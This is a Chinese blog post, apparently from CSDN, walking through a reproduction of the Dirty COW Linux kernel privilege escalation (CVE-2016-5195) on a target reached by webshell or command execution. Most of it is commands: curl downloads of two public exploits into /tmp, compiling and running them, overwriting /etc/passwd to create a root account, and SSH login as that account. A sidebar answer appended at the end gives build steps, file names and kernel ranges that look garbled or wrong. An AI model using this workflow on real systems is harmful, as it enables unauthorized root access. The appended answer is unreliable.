脏牛漏洞复现(CVE-2016-5195)

最新推荐文章于 2024-03-26 18:15:00 发布
最新推荐文章于 2024-03-26 18:15:00 发布
阅读量1k 收藏 1
点赞数
分类专栏: 漏洞复现 环境搭建
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/114361374
版权

脏牛漏洞复现(CVE-2016-5195)

环境准备

查看系统版本并且添加用户

uname -a

在这里插入图片描述
切换用户
在这里插入图片描述

环境

webshell来进行操作

只需要通过webshell在/tmp目录下写入文件即可

无webshell

机器出网

例如机器出网,但是只能执行命令,那么就需要使用命令来下载

机器不出网

这种比较麻烦,通过echo逐行写入即可
这里使用无webshell,但是目标出网的方法
可以使用github,也可以使用自己的服务器

python -m http.server 80            #python3

python -m SimpleHTTPServer 80       #python2

在目录下放置exp

EXP1

https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c

curl -o /tmp/dirtycow.c https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -pthread /tmp/dirtycow.c -o /tmp/dirtyc0w
chmod +x /tmp/dirtyc0w

这样就可以写入文件

/tmp/dirtyc0w /tmp/dirtycow.c 123

需要等待的久一点,

EXP2

https://github.com/FireFart/dirtycow/blob/master/dirty.c

curl -o /tmp/dirty.c https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt
chmod +x /tmp/dirty

这个exp是修改/etc/passwd
可以使用加速源

https://raw.fastgit.org/FireFart/dirtycow/master/dirty.c

/tmp/dirty my-new-password

之后使用端口转发或者http代理连入
使用账号firefart密码my-new-password登录ssh

ssh firefart@1.1.1.1 -p 22

登录成功之后即可使用root权限操作,但是需要还原/etc/passwd

mv /tmp/passwd.bak /etc/passwd

还原之后一样可以添加用户

whojoe
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现CVE-2016-5195复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
Linux提权—脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
Dirtycow: dirty0w.c(脏牛漏洞
qq_40976667的博客
02-11 1099
/* ####################### dirtyc0w.c ####################### $ sudo -s # echo this is not a test > foo # chmod 0404 foo $ ls -lah foo -r-----r-- 1 root root 19 Oct 20 15:23 foo $ cat foo this is not a test $ gcc -pthread dirtyc0w.c -o dirtyc0w $ ./dirt
脏牛提权(靶机复现
最新发布
tubug的博客
03-26 1652
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛CVE编号是CVE-2016-5195漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
经典Linux提取(脏牛CVE-2016-5195)小记
weixin_51392885的博客
11-16 404
Linux提取
脏牛提权 CVE-2016-5195
qq_42307546的博客
04-14 449
漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以 破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的 写权限,进一步获取 root 权限 exp下载 https://github.com/Brucetg/DirtyCow-EXP 该漏洞需要攻击者先获取一个低权限的用户,首先新建一个账户yidian 密码123456 将脚本上传到目标吗服务器,gcc编译 gcc -pthread dirtyc0w.c
漏洞复现- - -CVE-2016-5195 Dirty Cow脏牛提权漏洞
weixin_67503304的博客
11-02 4578
本文主要讲解了脏牛漏洞的提全过程及其修复建议。
深度分析“大小脏牛漏洞CVE-2016-5195CVE-2017-1000405
VN520的博客
08-17 773
脏牛漏洞(CVE-20165195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛漏洞
vulhub漏洞复现 CVE-2016-3088
03-14
vulhub漏洞复现 CVE-2016-3088
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
12-26
解决 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ps1 文件
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
CVE-2016-5195 复现记录
CoLin的pwn小屋
03-03 999
Dirty COW——CVE-2016-5195 复现与分析
漏洞复现CVE-2016-5195 DirtyCow 脏牛提权
做自己喜欢的事,并将其发挥到极致!
03-10 7323
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
CVE漏洞复现-CVE-2016-5195 脏牛漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-06 620
CVE-2016-5195 即 dirtyCOW ,俗称「脏牛漏洞,是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的越权读写。存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。
CVE复现NO.00001】“脏牛漏洞CVE-2016-5195复现及简要分析
arttnba3的博客
04-16 3848
CVE复现NO.00001】CVE-2016-5195复现及简要分析[github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺页异常(hard page fault)③无效缺页异常(invalid page faul
脏牛漏洞影响的linux内核,CVE-2016-5195 脏牛漏洞:Linux内核通杀提权漏洞验证 | 聂扬帆博客...
weixin_33433067的博客
04-30 454
一、漏洞简介漏洞编号:CVE-2016-5195漏洞名称:脏牛(Dirty COW)漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。Android 7.0最新的10月补丁安全级别的系统上测试过漏洞POC,确认Android受影响二、漏洞影响1. 没有权限的本地...
LINUX 提权 脏牛CVE-2016-5195
m0_65096687的博客
05-24 775
Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)这里要使用python开启一个交互式的伪终端,不然会提权失败。靶场环境是vluhub上的。upload 传 对方tmp目录下。msf上线找这个Drupal漏洞。不会传的看之前提权前信息搜集。下载后文件是一个.cpp文件。最后flag在root目录下。这里写复现过程,不写原理。传脚本上去检测内核漏洞。运行不了就给 +x权限。编译dcow.cpp。
Linux提权一脏牛漏洞(CVE-2016-5195)复现
07-28
你好!对于Linux提权的脏牛漏洞CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值